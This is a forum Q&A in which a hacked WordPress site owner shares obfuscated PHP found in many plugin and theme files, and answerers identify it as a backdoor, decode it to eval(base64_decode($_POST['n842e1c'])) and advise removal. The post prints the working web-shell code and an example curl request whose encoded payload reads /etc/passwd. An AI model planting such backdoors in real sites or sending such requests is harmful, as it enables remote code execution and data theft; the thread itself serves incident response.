Suspicious code found in my WordPress site – How to fix?

2 Views

One of my site was hacked last night and some porno content was placed on my site.

What I have done:

Read More

I have removed manually the adult content from site by using FTP.

My website is up now and working fine. But, still I am able to find some code in my plugin and theme files. Which was not written by me, Code is as below: 

   <?php 
        $sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
    ?>

What my queries are:

  • What this code stands for, what is this doing?
  • Is this harmful?
  • Should I remove this code from my files?
  • Is this will make any effect on my site if removed?

Other Code Suggestions Required:

This sort of code is available in 100+ files. Is there any method to remove code from all files in once? Or any method to keep code and just make it disinfect? so, it will save my time to remove code manually from too much files.

Post Views: 2

Related posts

4 comments

  1. What this code stands for, what is this doing?

    This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.

    <?php
eval( base64_decode( $_POST['n842e1c'] ) );

    An attacker can make a post request to this file with his encoded payload in POST parameter n842e1c and execute PHP code.

    Example:

    curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE

    Here this ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the BASE64 encoded string of echo readfile('/etc/passwd');.

    Is this harmful?

    Yes

    Should I remove this code from my files?

    Yes

    Will this make any effect on my site if removed?

    No

    Here are some tips to help you clean the website. Also, follow this official post by wordpress to take necessary steps.

    1. It’s a backdoor, taking a POST parameter named n842e1c and execute it. Instruction is encoded as Base64.
    2. It is.
    3. You should immediately.
    4. Nothing, remove it asap.

    Maybe re-install wordpress, or you could quickly develop a script in python (or something else) to remove this string from your files.

  3. PHP eval is dangerous.

    It basically executes the code within it’s function. So you must remove it if you are not sure of it’s use in your website.

    The eval() language construct is very dangerous because it allows
    execution of arbitrary PHP code. Its use thus is discouraged. If you
    have carefully verified that there is no other option than to use this
    construct, pay special attention not to pass any user provided data
    into it without properly validating it beforehand.
    Source

    You can not disable it directly so the only choice is you remove the code from all the files.

Comments are closed.